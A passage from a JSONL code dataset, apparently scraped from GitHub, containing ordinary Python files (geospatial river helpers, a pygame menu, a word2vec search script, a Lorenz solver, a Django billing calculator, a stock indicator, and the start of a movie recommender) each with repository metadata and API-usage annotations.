"line_number": 127, "usage_type": "call"}, {"api_name": "gvm.language.syntax.SyntaxToken", "line_number": 130, "usage_type": "call"}, {"api_name": "gvm.locations.Location", "line_number": 146, "usage_type": "call"}, {"api_name": "gvm.language.syntax.SyntaxToken", "line_number": 149, "usage_type": "call"}, {"api_name": "gvm.language.syntax.SyntaxToken", "line_number": 153, "usage_type": "call"}, {"api_name": "typing.Iterator", "line_number": 100, "usage_type": "name"}, {"api_name": "gvm.language.syntax.SyntaxToken", "line_number": 100, "usage_type": "name"}]} +{"seq_id": "18331046548", "text": "import os, sys, re\nfrom pathlib import Path\nimport numpy as np, pandas as pd\n\nimport pdb\nfrom inspect import getmro\nfrom typing import Union, Iterable, Collection\n\nfrom shapely.geometry import Polygon, Point\n\n# if sys.version_info <= (3,5):\ntry:\n import geopandas as gpd\n import apls_tools # dependent on geopandas inside itself\nexcept ImportError: # will be 3.x series\n pass\n\n###############################################################################\n### Add this file's path ###\n###############################################################################\nfile_dir = os.path.dirname(os.path.realpath(__file__))\n# file_dir = os.path.dirname(os.path.realpath('.'))\nprint(\"Importing: \", file_dir)\n\nif file_dir not in sys.path:\n sys.path.insert(0, file_dir)\n print(f\"Added {str(file_dir)} to sys.path\")\n \n \n###############################################################################\n### Import my modules ###\n###############################################################################\nfrom utils import nprint\nfrom geo_helpers import bounds2poly, crop_gdf_to_bounds, get_polys_at_lonlat\n\n\n###############################################################################\n### Helpers ###\n###############################################################################\ndef load_river_csvs(csv_dir):\n \"\"\"\n Given a directory containing csv files with the same header,\n returns a pd.DataFrame of concatenated csvs with a single header\n \"\"\"\n if isinstance(csv_dir, str):\n csv_dir = Path(csv_dir).absolute()\n fns = [p for p in csv_dir.iterdir() if p.suffix == '.csv']\n dfs = []\n for fn in fns:\n dfs.append(pd.read_csv(fn))\n data = pd.concat(dfs)\n data.reset_index(inplace=True)\n data.drop('index', axis=1, inplace=True)\n data['Time'] = data.Time.astype('datetime64[ns]')\n return data\n \n \ndef select_gdf_at_lonlat(gdf, lon, lat):\n \"\"\"\n Returns a new GeoDataFrame that intersects with the point at lon, lat\n \"\"\"\n p = Point(lon,lat)\n gdf_selected = gdf[gdf.intersects(p)]\n return gdf_selected\n\n \n\ndef get_basin_id(basin_data: gpd.GeoDataFrame, \n lon: float, \n lat: float):\n \n gdf_selected = select_gdf_at_lonlat(basin_data,lon,lat)\n if len(gdf_selected) > 0:\n return gdf_selected['HYBAS_ID'].item()\n else:\n return None\n \ndef select_gdf_in_basin(gdf: gpd.GeoDataFrame, \n basin_data: gpd.GeoDataFrame,\n basin_id:str, \n basin_id_col='HYBAS_ID',\n verbose=False):\n \n gdf_basin = basin_data[basin_data[basin_id_col] == basin_id]\n bounds = gdf_basin.total_bounds\n gdf_selected = crop_gdf_to_bounds(gdf, bounds, remove_empty=True)\n \n if verbose:\n print(len(gdf_selected), len(gdf_selected.groupby(['Longitude', 'Latitude'])))\n \n return gdf_selected", "repo_name": "mintproject/MINT-GeoViz", "sub_path": "examples/utils/river_helpers.py", "file_name": "river_helpers.py", "file_ext": "py", "file_size_in_byte": 2933, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 21, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "sys.path.insert", "line_number": 26, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 51, "usage_type": "call"}, {"api_name": "shapely.geometry.Point", "line_number": 62, "usage_type": "call"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 68, "usage_type": "attribute"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 78, "usage_type": "attribute"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 79, "usage_type": "attribute"}, {"api_name": "geo_helpers.crop_gdf_to_bounds", "line_number": 86, "usage_type": "call"}]} +{"seq_id": "20935609641", "text": "\r\nimport pygame\r\nimport sys\r\n\r\n\r\n\r\npygame.init()\r\n\r\ndef menu(estado):\r\n #Criação\r\n tela = pygame.display.set_mode((600,400),0,32)\r\n\r\n #Fontes\r\n fonte1 = pygame.font.Font(None, 64)\r\n fonte2 = pygame.font.Font(None, 40)\r\n titulo = fonte1.render(\"Asteroids\",1,(255,255,255))\r\n F_new_game = fonte2.render(\"New Game\",1,(255,255,255))\r\n F_ajuda = fonte2.render(\"Help\",1,(255,255,255))\r\n F_sair = fonte2.render(\"Exit\",1,(255,255,255))\r\n\r\n #Imagens\r\n imagem = pygame.image.load(\"background.jpg\")\r\n fundo = pygame.transform.scale(imagem,(700,500))\r\n \r\n while estado:\r\n # x- Sair\r\n for evento in pygame.event.get():\r\n if evento.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n # New Game\r\n if evento.type == pygame.MOUSEBUTTONDOWN:\r\n if pygame.mouse.get_pressed() == (1,0,0):\r\n x,y = pygame.mouse.get_pos()\r\n if (x > 240 and x < 380) and (y > 130 and y < 155):\r\n import Jogo\r\n estado = False\r\n #Help\r\n if evento.type == pygame.MOUSEBUTTONDOWN:\r\n if pygame.mouse.get_pressed() == (1,0,0):\r\n x,y = pygame.mouse.get_pos()\r\n if (x > 280 and x < 345) and (y > 170 and y < 200):\r\n return \"ajuda\"\r\n estado = False\r\n #Sair \r\n if evento.type == pygame.MOUSEBUTTONDOWN:\r\n if pygame.mouse.get_pressed() == (1,0,0):\r\n x,y = pygame.mouse.get_pos()\r\n if (x > 280 and x < 340) and (y > 205 and y < 240):\r\n return \"sair\"\r\n estado = False\r\n \r\n tela.blit(fundo,(0,0))\r\n tela.blit(titulo,(200,60))\r\n tela.blit(F_new_game,(240,130))\r\n tela.blit(F_ajuda,(280,170))\r\n tela.blit(F_sair,(280,215))\r\n pygame.display.flip()\r\n\r\ndef ajuda(estado):\r\n #Criação\r\n tela = pygame.display.set_mode((785,600),0,32)\r\n\r\n #Fontes\r\n fonte1 = pygame.font.Font(None,30)\r\n voltar = fonte1.render(\"Voltar\",1,(255,255,255))\r\n \r\n #Imagens\r\n imagem = pygame.image.load(\"ajuda.jpg\")\r\n fundo = pygame.transform.scale(imagem,(800,600))\r\n \r\n while estado:\r\n # x - sair\r\n for evento in pygame.event.get():\r\n if evento.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n #Sair\r\n if evento.type == pygame.MOUSEBUTTONDOWN:\r\n if pygame.mouse.get_pressed() == (1,0,0):\r\n x,y = pygame.mouse.get_pos()\r\n if (x > 220 and x < 280) and (y > 300 and y < 320):\r\n pygame.quit()\r\n sys.exit()\r\n #Menu\r\n if evento.type == pygame.MOUSEBUTTONDOWN:\r\n\r\n if pygame.mouse.get_pressed() == (1,0,0):\r\n x,y = pygame.mouse.get_pos()\r\n if (x > 550 and x < 620) and (y > 550 and y < 600):\r\n return \"menu\"\r\n estado = False\r\n \r\n tela.blit(fundo,(0,0))\r\n tela.blit(voltar,(560,550))\r\n pygame.display.flip()\r\ndef jogo(estado):\r\n \r\n #Criação\r\n tela = pygame.display.set_mode((600,400),0,32)\r\n\r\n #Fontes\r\n fonte1 = pygame.font.Font(None, 20)\r\n voltar = fonte1.render(\"Voltar\",1,(255,255,255))\r\n \r\n #Imagens\r\n imagem = pygame.image.load(\"ajuda.jpg\")\r\n fundo = pygame.transform.scale(imagem,(600,600))\r\n \r\n while estado:\r\n for evento in pygame.event.get():\r\n if evento.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n \r\n tela.fill((0,0,0))\r\n pygame.display.flip()\r\n \r\nporta = \"menu\"\r\n\r\nwhile porta == \"menu\":\r\n porta = menu(True)\r\n if porta == \"sair\":\r\n pygame.quit()\r\n sys.exit()\r\n while porta == \"ajuda\":\r\n porta = ajuda(True)\r\n while porta == \"jogo\":\r\n porta = jogo(True)\r\n", "repo_name": "GabrielFerraroDev/Pygame", "sub_path": "Xabalu/menu base.py", "file_name": "menu base.py", "file_ext": "py", "file_size_in_byte": 4155, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.init", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 27, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 29, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pressed", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 34, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pressed", "line_number": 40, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 41, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pressed", "line_number": 47, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 58, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 62, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 62, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 65, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 65, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 69, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 69, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 70, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 70, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 76, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 77, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pressed", "line_number": 80, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 80, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 81, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 83, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 84, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 86, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pressed", "line_number": 88, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 88, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 89, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 89, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 96, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 96, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 100, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 100, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 103, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 103, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 107, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 107, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 108, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 108, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 111, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 111, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 112, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 113, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 114, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 117, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 117, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 124, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 125, "usage_type": "call"}]} +{"seq_id": "73989201444", "text": "import numpy as np\nfrom gensim.models import word2vec\n\nDir_path = '../data'\n# Dir_path = 'final'\n\ndef readData():\n\t### load all word count\n\tallWordCount = np.load( Dir_path + '/' + 'allWordCount1.npy')\n\n\t### load all word list\n\twith open (Dir_path + '/' + 'allWordList1.txt', encoding='utf-8') as f:\n\t\tallWordList = f.read().splitlines()\n\tf.close()\n\n\t### load user and their word\n\tuserID = []\n\tuserWord = []\n\tallWordSet = set()\n\twith open(Dir_path + '/' + 'sortedDic', encoding='utf-8') as f:\n\t\tlines = f.read().splitlines()\n\t\tfor line in lines:\n\t\t\tline = line.split(',')\t\n\t\t\tuserID.append(line[0])\n\t\t\tuserWord.append(line[1].split())\n\t\t\tfor w in line[1].split():\n\t\t\t\tallWordSet.add(w)\n\tf.close()\n\n\t# print('save all word list')\n\t# allWordList = list(allWordSet)\n\t# with open(Dir_path + '/' + 'allWordList.txt', 'w', encoding='utf-8') as f:\n\t# \tfor w in allWordList:\n\t# \t\tf.write(w + '\\n')\n\t# f.close()\n\t# print(len(allWordList))\n\n\t### load chosen word\n\t# with open(Dir_path + '/' + 'chosenWord.txt', encoding='utf-8') as f:\n\t# \tchosenWord = f.read().splitlines()\n\n\t### load topic word\n\t# topicList = []\n\t# with open(Dir_path + '/' + 'topicWord.txt', encoding='utf-8') as f:\n\t# \tlines = f.read().splitlines()\n\t# \tfor line in lines:\n\t# \t\ttopicList.append(line.split())\n\t\n\t### build word dictionary\n\t# wordDic = {}\n\t# for i, topic in enumerate(topicList):\n\t# \tfor j, word in enumerate(topic):\n\t# \t\tif word not in wordDic.keys():\n\t# \t\t\twordDic[word] = [i, j]\n\t# \t\telse:\n\t# \t\t\tif wordDic[word][1] > j:\n\t# \t\t\t\twordDic[word] = [i, j]\n\n\t### all word count\n\t# allWordCount = np.zeros([len(userID), len(allWordList)])\n\t# for i, wordList in enumerate(userWord):\n\t# \tfor word in wordList:\n\t# \t\tj = allWordList.index(word)\n\t# \t\tallWordCount[i, j] += 1\n\t# np.save('allWordCount.npy', allWordCount)\n\n\treturn allWordCount, allWordList, userID, userWord\n\ndef returnList_org(query):\n\n\t### check chosenWord\n\t# find query id\n\tif query not in allWordList:\n\t\treturnList = 'Sorry, not found'\n\telse:\n\t\tqueryID = allWordList.index(query)\n\t\ttargetList = allWordCount[:, queryID]\n\t\t\n\t\tindexList = (-targetList).argsort()\n\t\treturnList = []\n\t\tfor i in range(20):\n\t\t\tif(targetList [indexList[i]] > 0):\n\t\t\t\treturnList.append(userID[indexList[i]])\n\t\t\t\t# print(userID[indexList[i]],targetList [indexList[i]])\n\t\t\telse:\n\t\t\t\tbreak\n\n\treturn returnList\ndef returnList(query):\n ### check chosenWord\n # find query id\n model = word2vec.Word2Vec.load(Dir_path + '/' + '/200_10.model.bin')\n if query not in model.wv.vocab:\n returnList = 'Sorry, not found'\n else:\n wordList = [(query,2)]\n wordList.extend(model.most_similar(query))\n score = np.zeros(len(userID))\n\n queryIDList = []\n\n for word in wordList:\n print (word)\n wordID = allWordList.index(word[0])\n queryIDList.append(wordID)\n\n for i, wordID in enumerate(queryIDList):\n weight = wordList[i][1]\n # weight = 11 - i\n # print (weight)\n score = score + np.array(allWordCount[:, wordID]) * weight\n\n # targetList = allWordCount[:, queryID]\n # indexList = (-targetList).argsort()\n\n indexList = (-score).argsort()\n returnList = []\n for i in range(20):\n if score[indexList[i]] > 0:\n returnList.append(userID[indexList[i]])\n # print(userID[indexList[i]],score[indexList[i]])\n else:\n break\n\n return returnList\n\ndef main():\n\tglobal allWordCount, allWordList, userID, userWord\n\tprint('reading datas...')\n\tallWordCount, allWordList, userID, userWord = readData()\n\n\t### assume query is a single word\n\t# print('Please type your query')\n\t# query = input()\n\t# ans = returnList(query)\n\t# ans = returnList_org(query)\n\t# print(ans)\n\t# return ans\n\t# a = [1, 3, 5, 7]\n\t# print(a.index(6))\n\n\n# if __name__ == '__main__':\n# \tmain()", "repo_name": "kevinisbest/Dazzled-Darling", "sub_path": "src/returnUserList.py", "file_name": "returnUserList.py", "file_ext": "py", "file_size_in_byte": 3867, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.load", "line_number": 9, "usage_type": "call"}, {"api_name": "gensim.models.word2vec.Word2Vec.load", "line_number": 92, "usage_type": "call"}, {"api_name": "gensim.models.word2vec.Word2Vec", "line_number": 92, "usage_type": "attribute"}, {"api_name": "gensim.models.word2vec", "line_number": 92, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 111, "usage_type": "call"}]} +{"seq_id": "24566052374", "text": "import numpy as np\nfrom scipy.integrate import odeint\nfrom random import random\n\nrho = 28.0\nsigma = 10.0\nbeta = 8.0 / 3.0\n\ndef f(state, t):\n x, y, z = state # Unpack the state vector\n return sigma * (y - x), x * (rho - z) - y, x * y - beta * z # Derivatives\n\ndef export_states():\n state0 = [1.0*random()*2-1, 1.0*random()*2-1, 1.0*random()*2-1]\n t = np.arange(0.0, 1000.0, 0.01)\n\n states = odeint(f, state0, t)\n return states", "repo_name": "Noverdi/lorenz_system_visualization", "sub_path": "lorenz_system.py", "file_name": "lorenz_system.py", "file_ext": "py", "file_size_in_byte": 445, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "random.random", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 15, "usage_type": "call"}, {"api_name": "scipy.integrate.odeint", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "31708830896", "text": "import logging\nfrom typing import Optional\n\nimport moneyed\nfrom django.apps import apps\n\nfrom billing.lib.utils import clsfstr\n\nfrom .rates import convert_money\n\nCURRENCIES_CODES = moneyed.CURRENCIES.keys()\n\n\ndef get_currency_by_country(country) -> Optional[moneyed.Currency]:\n country = get_country_by_tld_or_name(country)\n names = [country.name_en.upper()]\n names += [x.upper() for x in country.alternate_names.split(',')]\n\n for code, currency in moneyed.CURRENCIES.items():\n for name in names:\n if name in currency.countries:\n return currency\n return None\n\n\ndef get_country_by_tld_or_name(country):\n country_model = apps.get_model('hotels.Country')\n try:\n if country and str(country).isnumeric() and not isinstance(\n country, country_model):\n country = country_model.objects.get(pk=country)\n elif country and not str(country).isnumeric() and not isinstance(\n country, country_model):\n country = country_model.objects.filter(tld=country).first()\n except country_model.DoesNotExist:\n country = None\n\n return country\n\n\nclass CalcException(Exception):\n pass\n\n\nclass CalcByQantityPeriodCountry(object):\n \"\"\"\n Calculate the service price by the period, country and quantity\n \"\"\"\n\n def __init__(self, period: int, period_units: str, quantity: int,\n country: str) -> None:\n self.period = period\n self.period_units = period_units\n self.quantity = quantity\n self.country = get_country_by_tld_or_name(country)\n self.services = [] # type: list\n\n def get_prices(self):\n self._fill_services_for_calcualtion()\n prices = self._calc_services()\n\n if not len(prices):\n raise CalcException('Prices are empty')\n\n return prices\n\n def _fill_services_for_calcualtion(self):\n service_model = apps.get_model('finances.Service')\n if self.period:\n service = service_model.objects.get_by_period(\n service_type='rooms',\n period=self.period,\n period_units=self.period_units,\n )\n if not service:\n raise CalcException('Service not found.')\n self.services.append(service)\n else:\n self.services = service_model.objects.get_all_periods(\n service_type='rooms',\n period_units=self.period_units,\n )\n\n def _get_local_price(self, price: moneyed.Money) -> moneyed.Money:\n \"\"\"\n Get the local price according to the country currency\n \"\"\"\n currency = getattr(self.country, 'currency')\n if currency and currency != price.currency:\n return convert_money(price, currency)\n return price\n\n def _calc_services(self) -> list:\n prices = []\n for service in self.services:\n price = Calc.factory(service).calc(\n quantity=self.quantity, country=self.country)\n price_local = self._get_local_price(price)\n prices.append({\n 'status':\n True,\n 'price':\n price.amount,\n 'price_currency':\n price.currency.code,\n 'period':\n service.period,\n 'price_local':\n price_local.amount if price_local else None,\n 'price_currency_local':\n price_local.currency.code if price_local else None\n })\n\n return prices\n\n\nclass CalcByQuery(CalcByQantityPeriodCountry):\n \"\"\"\n Calculate the service price by the query serializer\n \"\"\"\n\n def __init__(self, query: dict) -> None:\n super().__init__(\n query.get('period'),\n query.get('period_units'),\n query.get('quantity'),\n query.get('country'),\n )\n\n\nclass Calc(object):\n \"\"\"\n Calc abstract class\n \"\"\"\n\n def __init__(self, entry):\n if isinstance(entry, apps.get_model('clients.ClientService')):\n self.client_service = entry\n self.quantity = entry.quantity\n self.country = entry.client.country\n self.service = self._get_service(entry)\n\n @staticmethod\n def _get_service(entry):\n \"\"\"\n Get service object by id\n \"\"\"\n if isinstance(entry, apps.get_model('clients.ClientService')):\n service = entry.service\n elif isinstance(entry, apps.get_model('finances.Service')):\n service = entry\n else:\n service = apps.get_model('finances.Service').objects.get(pk=entry)\n return service\n\n @staticmethod\n def factory(entry, country=None):\n \"\"\"\n Factory method (entry - Service or ClientService or int)\n \"\"\"\n service = Calc._get_service(entry)\n class_name = service.type.title().replace('_', '')\n\n return clsfstr('finances.lib.calc', class_name)(entry)\n\n def calc(self, quantity=None, country=None):\n \"\"\"\n Calc price\n \"\"\"\n if not quantity:\n quantity = getattr(self, 'quantity', None)\n\n country = self._get_country(country)\n\n if not quantity or not country:\n raise CalcException('Invalid country or quantity.')\n\n prices = list(\n apps.get_model('finances.Price').objects.filter_by_country(\n country, self.service))\n if not prices:\n raise CalcException('Empty prices.')\n\n total = self._do_calc_total_price(prices, quantity)\n self._log_calc_result(total, prices, country, quantity)\n\n return total\n\n def _get_country(self, country):\n \"\"\"\n Polymorph getting of country\n \"\"\"\n country = get_country_by_tld_or_name(country)\n if not country:\n country = getattr(self, 'country', None)\n\n return country\n\n def _do_calc_total_price(self, prices, quantity):\n \"\"\"\n Calculate price based on prices table and quantity\n \"\"\"\n table = []\n default = [d for d in prices if d.for_unit]\n\n for r in range(1, quantity + 1):\n p = [\n p for p in prices\n if (p.period_from is None or p.period_from <= r) and (\n p.period_to is None or p.period_to >= r)\n ]\n if p and not p[0].for_unit and p[0] in table:\n p[0] = 0\n if not p:\n p.append(default[0] if default else 0)\n table.append(p[0])\n\n total = 0\n for item in table:\n total += getattr(item, 'price', 0)\n return total\n\n def _log_calc_result(self, total, prices, country, quantity):\n \"\"\"\n Log the result of calculation\n \"\"\"\n template = \"\"\"\n'Calc result: {}. Prices: {}. Country: {}. \\\nQuantity: {}. Service: {}.'\n \"\"\"\n logging.getLogger('billing').info(\n template.format(\n total,\n prices,\n country,\n quantity,\n self.service,\n ))\n\n\nclass Rooms(Calc):\n \"\"\"\n Calc rooms service\n \"\"\"\n pass\n\n\nclass Other(Calc):\n \"\"\"\n Calc other service\n \"\"\"\n pass\n", "repo_name": "webmalc/maxibooking-billing-django", "sub_path": "finances/lib/calc.py", "file_name": "calc.py", "file_ext": "py", "file_size_in_byte": 7279, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "moneyed.CURRENCIES.keys", "line_number": 11, "usage_type": "call"}, {"api_name": "moneyed.CURRENCIES", "line_number": 11, "usage_type": "attribute"}, {"api_name": "moneyed.CURRENCIES.items", "line_number": 19, "usage_type": "call"}, {"api_name": "moneyed.CURRENCIES", "line_number": 19, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 14, "usage_type": "name"}, {"api_name": "moneyed.Currency", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.apps.apps.get_model", "line_number": 27, "usage_type": "call"}, {"api_name": "django.apps.apps", "line_number": 27, "usage_type": "name"}, {"api_name": "django.apps.apps.get_model", "line_number": 68, "usage_type": "call"}, {"api_name": "django.apps.apps", "line_number": 68, "usage_type": "name"}, {"api_name": "moneyed.Money", "line_number": 84, "usage_type": "attribute"}, {"api_name": "rates.convert_money", "line_number": 90, "usage_type": "call"}, {"api_name": "django.apps.apps.get_model", "line_number": 137, "usage_type": "call"}, {"api_name": "django.apps.apps", "line_number": 137, "usage_type": "name"}, {"api_name": "django.apps.apps.get_model", "line_number": 148, "usage_type": "call"}, {"api_name": "django.apps.apps", "line_number": 148, "usage_type": "name"}, {"api_name": "django.apps.apps.get_model", "line_number": 150, "usage_type": "call"}, {"api_name": "django.apps.apps", "line_number": 150, "usage_type": "name"}, {"api_name": "django.apps.apps.get_model", "line_number": 153, "usage_type": "call"}, {"api_name": "django.apps.apps", "line_number": 153, "usage_type": "name"}, {"api_name": "billing.lib.utils.clsfstr", "line_number": 164, "usage_type": "call"}, {"api_name": "django.apps.apps.get_model", "line_number": 179, "usage_type": "call"}, {"api_name": "django.apps.apps", "line_number": 179, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 231, "usage_type": "call"}]} +{"seq_id": "35970320826", "text": "from abc import ABC\n\nimport StockData.StockDataHolder\nfrom IndicatorsCalculation.IndicatorsClassInterface import IndicatorClassInterface\nfrom matplotlib import pyplot as plt\n\n\nclass SupplyOnDemand(IndicatorClassInterface, ABC):\n\n def __init__(self):\n self.__analysis_outcome = None\n self.__stock_data = None\n self.__supply_on_demand = []\n\n def set_stock_data(self, stock_data: StockData.StockDataHolder.StockDataHolder):\n self.__stock_data = stock_data\n\n def set_required_analysis_outcome(self, analysis_outcome):\n self.__analysis_outcome = analysis_outcome\n\n def calculate_indicator(self):\n\n data = self.__stock_data.raw_data\n close = data['Close']\n open = data['Open']\n high = data['High']\n low = data['Low']\n volume = data['Volume']\n\n all_volume = sum(volume)\n\n supply_on_demand = [all_volume]\n\n \"\"\"Cel - obliczenie ile zostało potencjalnych nabywców\"\"\"\n for date in self.__stock_data.get_dates_arrays_dict(date_format=\"iso_string\")['daily']:\n if close[date] > open[date]:\n supply_on_demand.append(volume[date] - supply_on_demand[-1])\n else:\n supply_on_demand.append(volume[date] + supply_on_demand[-1])\n\n self.__supply_on_demand = supply_on_demand\n\n def plot(self):\n plt.plot(self.__supply_on_demand)\n plt.show()\n", "repo_name": "LozynskiW/BigShortPy", "sub_path": "IndicatorsCalculation/SupplyDemandBased.py", "file_name": "SupplyDemandBased.py", "file_ext": "py", "file_size_in_byte": 1412, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "IndicatorsCalculation.IndicatorsClassInterface.IndicatorClassInterface", "line_number": 8, "usage_type": "name"}, {"api_name": "abc.ABC", "line_number": 8, "usage_type": "name"}, {"api_name": "StockData.StockDataHolder.StockDataHolder", "line_number": 15, "usage_type": "attribute"}, {"api_name": "StockData.StockDataHolder", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}]} +{"seq_id": "7381008898", "text": "#!/usr/bin/env python\n# coding: utf-8\n\nimport pandas as pd\nfrom scipy.sparse import csr_matrix\nfrom sklearn.neighbors import NearestNeighbors\nfrom fuzzywuzzy import process\n\nuser_url=r\"https://drive.google.com/file/d/155oakHcdg3UWi9I-mKI4FWNGZM0G1knS/view?usp=share_link\"\nmov_url=r\"https://drive.google.com/file/d/1jFVDbi43OkinguO6URYlRf41nTbhRx6W/view?usp=share_link\"\n\nmovcol=['movieId','title']\ndf_movies = pd.read_csv(mov_url,names=movcol,sep='|',encoding='latin-1', usecols=['movieId', 'title'],\n dtype={'movieId': 'int32', 'title': 'str'})\ndf_movies.head()\n\nusercol=['userId','movieId','rating']\ndf_ratings = pd.read_csv(user_url,names=usercol,sep='\\t',encoding='latin-1', usecols=['userId', 'movieId', 'rating'],\n dtype={'userId': 'int32', 'movieId': 'int32', 'rating': 